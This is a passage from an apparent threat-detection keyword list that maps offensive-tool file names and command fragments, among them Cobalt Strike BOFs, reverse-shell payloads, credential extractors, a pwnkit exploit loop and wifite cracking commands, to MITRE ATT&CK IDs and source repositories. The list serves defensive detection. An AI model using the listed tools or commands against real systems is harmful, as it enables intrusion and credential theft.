- T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*Wh1t3Fox/polenum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WhatBreach*,offensive_tool_keyword,WhatBreach,WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:,T1593.001 - T1593.002 - T1593.003,TA0010 - TA0011 - ,N/A,N/A,Information Gathering,https://github.com/Ekultek/WhatBreach,1,0,N/A,N/A,10,945,152,2023-05-22T21:57:04Z,2019-04-19T20:40:19Z -*whatlicense-main.zip*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*whereami.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*whereami.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*WheresMyImplant.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*WheresMyImplant.git*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*WheresMyImplant.sln*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*while * do mv *GCONV_PATH=./value* done,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034 ,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*Whirlpool-Orig-512.verified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Whirlpool-Tweak-512.verified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Whisker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*whiskeysaml.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*whiskeysamlandfriends*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*whoami /user*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,0,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*whoami*,greyware_tool_keyword,whoami,whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.,T1003.001 - T1087 - T1057 ,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*whoami.exe* /groups*,greyware_tool_keyword,whoami,whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.,T1003.001 - T1087 - T1057 ,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*whoami.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*whoami.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*WhoamiGetTokenInfo*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*wifi/airpwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wifi/dnspwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wifi_dump_linux*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*wifi_fake_auth.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*WiFi_Hacker.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*wifi_pineapple_csrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*wifi_recon_handshakes*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*wifi-arsenal*,offensive_tool_keyword,wifi-arsenal,github repo with all the wireless exploitation tools available,N/A,N/A,N/A,N/A,Network Exploitation tools,https://github.com/0x90/wifi-arsenal,1,1,N/A,N/A,10,1690,401,2020-07-06T00:46:06Z,2015-03-22T18:38:03Z -*wifibroot.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wifi-bruteforcer*,offensive_tool_keyword,wifi-bruteforcer-fsecurify,Android application to brute force WiFi passwords without requiring a rooted device.,T1110 - T1555 - T1051 - T1081,TA0002 - TA0008 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/faizann24/wifi-bruteforcer-fsecurify,1,1,N/A,N/A,10,1094,328,2022-04-16T02:59:36Z,2017-01-02T17:54:33Z -*wifi-bruteforcer*,offensive_tool_keyword,wifi-bruteforcer-fsecurity,Wifi bruteforcer,T1110 - T1114 - T1601 - T1602 - T1603,TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/faizann24/wifi-bruteforcer-fsecurify,1,1,N/A,N/A,10,1094,328,2022-04-16T02:59:36Z,2017-01-02T17:54:33Z -*wifidump.cna*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*wifijammer*,offensive_tool_keyword,wifijammer,wifijammer,T1497 - T1498 - T1531,TA0001 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/DanMcInerney/wifijammer,1,1,N/A,N/A,10,3750,797,2023-07-04T01:43:51Z,2014-01-26T07:54:39Z -*wifiphisher*,offensive_tool_keyword,wifiphisher,The Rogue Access Point Framework.,T1553.003 - T1562 - T1539,TA0002 - TA0007 - ,N/A,N/A,Frameworks,https://github.com/wifiphisher/wifiphisher,1,1,N/A,N/A,10,12107,2517,2023-09-26T19:58:05Z,2014-09-26T12:47:28Z -*WiFi-Pumpkin*,offensive_tool_keyword,WiFi-Pumpkin,Framework for Rogue Wi-Fi Access Point Attack.,T1562 - T1530 - T1552 - T1553 - T1561,TA0005 - TA0006 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/P0cL4bs/WiFi-Pumpkin,1,1,N/A,N/A,10,3059,750,2020-04-18T19:32:52Z,2015-06-27T00:56:21Z -*wifite --crack*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite --dict *.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wifite -e *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite --kill*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wifite --wep *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*Wifite.py*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite2.git*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*win_chrome_password_extractor.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*win_fake_malware.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*win_keylogger.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*win_rev_http.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*win_rev_https.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*win_rev_tcp.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*win_wlan_passwd_and_wanip_extractor.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Win32.LaZagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Win32.Trojan*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Win32/Goodkit*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32/IceId*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32/Mikatz*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,mimikatz signatures,10,10,N/A,N/A,N/A,N/A -*Win32/Trickbot*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32/UACBypass*,signature_keyword,Antivirus Signature,windows defender antivirus signature for UAC bypass,N/A,N/A,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32:Trojan*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*win32_stage_boot_reverse_shell_revert.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*win32_stage_uploadexec.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*win32_stage_winexec.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win32kLeaker.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand 